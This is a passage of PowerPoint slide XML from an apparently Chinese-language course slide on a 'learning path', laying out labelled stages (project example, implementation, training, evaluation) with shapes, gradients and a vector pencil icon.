                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实例</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="76" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="11344" y="6929"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实施</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="84" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13895" y="6880"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目训练</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="86" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="16233" y="2830"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="87" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="88" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="89" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId6"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="90" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId7"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="91" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId8"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="92" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Text Placeholder 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16635" y="6800"/>
              <a:ext cx="1600" cy="484"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buNone/>
                <a:defRPr sz="2000" b="1" baseline="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="457200" indent="0">
                <a:buNone/>
                <a:defRPr sz="1200"/>
              </a:lvl2pPr>
              <a:lvl3pPr marL="914400" indent="0">
                <a:buNone/>
                <a:defRPr sz="1000"/>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1371600" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl4pPr>
              <a:lvl5pPr marL="1828800" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl5pPr>
              <a:lvl6pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl6pPr>
              <a:lvl7pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl7pPr>
              <a:lvl8pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl8pPr>
              <a:lvl9pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>项目评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="文本框 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4505325" y="1420495"/>
            <a:ext cx="2266950" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>学习路径</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
